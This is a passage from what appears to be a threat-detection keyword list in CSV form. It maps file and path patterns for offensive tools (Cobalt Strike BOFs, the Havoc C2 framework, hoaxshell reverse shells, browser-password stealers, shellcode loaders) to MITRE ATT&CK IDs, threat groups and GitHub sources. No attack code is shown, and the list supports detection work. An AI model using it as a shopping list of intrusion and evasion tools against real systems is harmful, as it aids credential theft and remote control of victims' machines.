- TA0009 - TA0040 - TA0010,N/A,N/A,Privilege Escalation,https://github.com/AlessandroZ/BeRoot,1,1,N/A,N/A,10,2262,488,2022-02-08T10:30:38Z,2017-04-14T12:47:31Z -*/guervild/BOFs*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/guervild/BOFs,1,1,N/A,10,10,153,27,2022-05-02T16:59:24Z,2021-03-15T23:30:22Z -*/guessed_emails.txt*,offensive_tool_keyword,AttackSurfaceMapper,AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target,T1595 - T1596,TA0043,N/A,N/A,Reconnaissance,https://github.com/superhedgy/AttackSurfaceMapper,1,0,N/A,6,10,1221,192,2023-09-11T05:26:53Z,2019-08-07T14:32:53Z -*/gyaansastra/CVE-2022-0847*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0008,N/A,N/A,Exploitation tools,https://github.com/gyaansastra/CVE-2022-0847,1,1,N/A,N/A,1,1,2,2022-03-20T15:46:04Z,2022-03-09T15:44:58Z -*/GzipB64.exe*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*/h8mail/*,offensive_tool_keyword,h8mail,Powerful and user-friendly password hunting tool.,T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001,TA0010,N/A,N/A,Information Gathering,https://github.com/opencubicles/h8mail,1,1,N/A,N/A,1,9,5,2019-08-19T09:46:33Z,2019-08-19T09:45:32Z -*/HackBrowserData*,offensive_tool_keyword,HackBrowserData,Decrypt passwords/cookies/history/bookmarks from the browser,T1555 - T1189 - T1217 - T1185,TA0002 - TA0009 - TA0001 - TA0010,N/A,N/A,Exploitation tools,https://github.com/moonD4rk/HackBrowserData,1,1,N/A,N/A,10,8729,1373,2023-10-02T14:38:41Z,2020-06-18T03:24:31Z -*/hackerid.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*/hackingtool.git*,offensive_tool_keyword,hackingtool,ALL IN ONE Hacking Tool For Hackers,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/Z4nzu/hackingtool,1,1,N/A,N/A,10,39264,4347,2023-09-13T19:08:33Z,2020-04-11T09:21:31Z -*/Hack-Tools.git*,offensive_tool_keyword,hack-tools,The all-in-one Red Team browser extension for Web Pentester,T1059.007 - T1505 - T1068 - T1216 - T1547.009,TA0002 - TA0001 - TA0009,N/A,N/A,Web Attacks,https://github.com/LasCC/Hack-Tools,1,1,N/A,9,10,5006,586,2023-10-03T15:40:37Z,2020-06-22T21:42:16Z -*/Hades.exe*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,0,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*/hades.git*,offensive_tool_keyword,hades,Go shellcode loader that combines multiple evasion techniques,T1055 - T1027 - T1218 - T1027.001 - T1036,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/f1zm0/hades,1,1,N/A,N/A,3,290,44,2023-06-21T19:22:57Z,2022-10-11T08:16:24Z -*/HadesLdr.git*,offensive_tool_keyword,HadesLdr,Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/CognisysGroup/HadesLdr,1,1,N/A,10,3,221,33,2023-07-15T21:23:49Z,2023-07-12T11:44:07Z -*/hades-main.zip*,offensive_tool_keyword,hades,Go shellcode loader that combines multiple evasion techniques,T1055 - T1027 - T1218 - T1027.001 - T1036,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/f1zm0/hades,1,1,N/A,N/A,3,290,44,2023-06-21T19:22:57Z,2022-10-11T08:16:24Z -*/hadoop-datanode-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/hadoop-jobtracker-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/hadoop-namenode-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/hadoop-secondary-namenode-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/hadoop-tasktracker-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Hak5.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,0,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*/hakrawler.git*,offensive_tool_keyword,hakrawler,Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application,T1190 - T1212 - T1087.001,TA0007 - TA0003 - TA0009,N/A,N/A,Web Attacks,https://github.com/hakluke/hakrawler,1,1,N/A,6,10,3967,458,2023-07-22T19:39:11Z,2019-12-15T13:54:43Z -*/hancitor.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/HandleKatz_BOF*,offensive_tool_keyword,cobaltstrike,A BOF port of the research of @thefLinkk and @codewhitesec,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/HandleKatz_BOF,1,1,N/A,10,10,93,17,2021-10-12T21:38:02Z,2021-10-12T18:45:06Z -*/HarmJ0y*,offensive_tool_keyword,Github Username,Co-founder of Empire. BloodHound. and the Veil-Framework | PowerSploit developer | krb lover | Microsoft PowerShell MVP | Security at the misfortune of others,N/A,N/A,N/A,N/A,POST Exploitation tools,https://github.com/HarmJ0y,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/HaryyUser.exe*,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,1,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z -*/hashcat*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/hashdump_dc*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/Hashi0x/*,offensive_tool_keyword,poc,Windows Message Queuing vulnerability exploitation with custom payloads,T1192 - T1507,TA0002,N/A,N/A,Network Exploitation Tools,https://github.com/Hashi0x/PoC-CVE-2023-21554,1,1,N/A,N/A,,N/A,,, -*/hashview.py*,offensive_tool_keyword,hashview,A web front-end for password cracking and analytics,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/hashview/hashview,1,1,N/A,10,4,319,38,2023-09-22T21:30:50Z,2020-11-23T19:21:06Z -*/havex.profile*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*/Havoc.cpp*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/Havoc.qss*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/Havoc.rc*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/Havoc/data/*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/Havoc/main/*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/HavocFramework/*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/HavocImages/*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/havoc-py/*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/hbase-master-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/hbase-region-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/hddtemp-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/hDendron.cs*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,1,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*/HeapCrypt.git*,offensive_tool_keyword,HeapCrypt,Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap,T1055.001 - T1027 - T1146,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/HeapCrypt,1,1,N/A,9,3,224,40,2023-08-02T02:24:42Z,2023-03-25T05:19:52Z -*/HellsGate.git*,offensive_tool_keyword,HellsGate,The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs,T1055 - T1548.002 - T1129,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/am0nsec/HellsGate,1,1,N/A,N/A,8,723,117,2021-06-28T15:42:36Z,2020-06-02T17:10:21Z -*/Heroinn/*,offensive_tool_keyword,Heroinn,A cross platform C2/post-exploitation framework implementation by Rust.,T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/b23r0/Heroinn,1,1,N/A,10,10,586,223,2022-10-08T07:27:38Z,2015-05-16T14:54:19Z -*/hid_inject.*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*/hid_sniff.*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*/HiddenDesktop.git*,offensive_tool_keyword,cobaltstrike,Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++,T1021.001 - T1133,TA0005 - TA0002,N/A,N/A,C2,https://github.com/WKL-Sec/HiddenDesktop,1,1,N/A,10,10,925,147,2023-05-25T21:27:20Z,2023-05-21T00:57:43Z -*/hijack_opener/*.js*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*/hijack_opener/*.rb*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*/HijackHunter/*,offensive_tool_keyword,HijackHunter,Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity,T1574.002 - T1059.003 - T1078.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*/HInvoke.cs*,offensive_tool_keyword,NixImports,A .NET malware loader using API-Hashing to evade static analysis,T1055.012 - T1562.001 - T1140,TA0005 - TA0003 - TA0040,N/A,N/A,Defense Evasion - Execution,https://github.com/dr4k0nia/NixImports,1,1,N/A,N/A,2,178,23,2023-05-30T14:14:21Z,2023-05-22T18:32:01Z -*/hlldz*,offensive_tool_keyword,Github Username,github username. 'My name is Halil Dalabasmaz. I consider myself Pwner.' containing exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/hlldz,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/hnap-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/hoaxshell*,offensive_tool_keyword,hoaxshell,An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic,T1203 - T1133 - T1190,TA0001 - TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/t3l3machus/hoaxshell,1,1,N/A,N/A,10,2655,443,2023-06-18T13:26:32Z,2022-07-10T15:36:24Z -*/hoaxshell/*.py*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*/holehe.git*,offensive_tool_keyword,holehe,holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.,T1598.004 - T1592.002 - T1598.001,TA0003 - TA0009,N/A,N/A,Reconnaissance,https://github.com/megadose/holehe,1,1,N/A,6,10,5659,655,2023-09-15T21:14:10Z,2020-06-25T23:03:02Z -*/hollow.x64.*,offensive_tool_keyword,cobaltstrike,EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. hijack main thread with APC and execute shellcode,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 